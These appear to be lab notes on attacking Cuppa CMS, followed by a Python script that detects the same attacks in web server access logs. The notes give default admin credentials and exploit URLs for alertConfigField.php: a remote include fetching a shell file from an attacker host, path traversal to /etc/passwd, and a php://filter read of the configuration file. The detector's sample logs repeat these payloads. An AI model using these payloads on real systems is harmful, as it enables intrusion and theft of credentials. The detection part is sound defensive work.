Cuppa CMS

http://10.11.1.1/administrator/

Default creds → admin:admin

#LFI

http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://kaliIP/shelly.txt?

#Path traversal

http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

#Reading /etc/passwd

http://10.11.1.1/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

#Find config files and decode base64 output

http://target/cuppa/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php

#Same with curl

curl -s --data-urlencode urlConfig=../../../../../../../etc/passwd http://10.11.1.116/administrator/alerts/alertConfigField.php
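
#Detecting these requests in web server logs

The same requests seen from the detection side, as an added example that is not part of the original notes: a Python script that flags access-log hits on alertConfigField.php whose urlConfig value carries a traversal sequence, a PHP stream wrapper, or a remote URL. The log lines, IP addresses and timestamps are constructed samples, and the combined log format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

ENDPOINT = "alerts/alertConfigField.php"   # script requested on this page
PARAM = "urlConfig"                        # parameter passed to the include
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
WRAPPER_RE = re.compile(r"^(php|data|expect|zip|phar|file|glob)://")
REMOTE_RE = re.compile(r"^(https?|ftps?)://")

def classify_value(value):
    """Return the reasons a urlConfig value looks like an inclusion attempt."""
    prev = None
    while prev != value:                   # undo double encoding (%252e%252e)
        prev, value = value, unquote(value)
    v = value.lower().replace("\\", "/")
    reasons = []
    if "../" in v:
        reasons.append("path-traversal")
    if WRAPPER_RE.match(v):
        reasons.append("stream-wrapper")
    if REMOTE_RE.match(v):
        reasons.append("remote-include")
    return reasons

def scan_line(line):
    """Return (target, reasons) for a flagged request to the endpoint, else None."""
    m = REQUEST_RE.search(line)
    url = urlsplit(m.group("target")) if m else None
    if url is None or not url.path.endswith(ENDPOINT):
        return None
    reasons = []
    for value in parse_qs(url.query, keep_blank_values=True).get(PARAM, []):
        reasons += classify_value(value)
    return (m.group("target"), reasons) if reasons else None

# Constructed sample log (documentation IPs, made-up timestamps).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /administrator/alerts/alertConfigField.php?urlConfig=../../../../etc/passwd HTTP/1.1" 200 1532',
    '192.0.2.10 - - [01/Jan/2024:10:00:05 +0000] "GET /cuppa/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php HTTP/1.1" 200 2048',
    '192.0.2.10 - - [01/Jan/2024:10:00:09 +0000] "GET /cuppa/alerts/alertConfigField.php?urlConfig=http://198.51.100.7/file.txt? HTTP/1.1" 200 312',
    '192.0.2.44 - - [01/Jan/2024:10:01:00 +0000] "GET /cuppa/index.php HTTP/1.1" 200 9000',
    '192.0.2.10 - - [01/Jan/2024:10:02:00 +0000] "GET /cuppa/alerts/alertConfigField.php?urlConfig=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1532',
]

def scan_log(lines):
    return [hit for hit in map(scan_line, lines) if hit]

if __name__ == "__main__":
    for target, reasons in scan_log(SAMPLE_LOG):
        print(", ".join(reasons), "<-", target)
```

The curl variant above sends urlConfig in the POST body, which a standard access log does not record; covering it requires request-body logging, with classify_value applied to the logged value.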
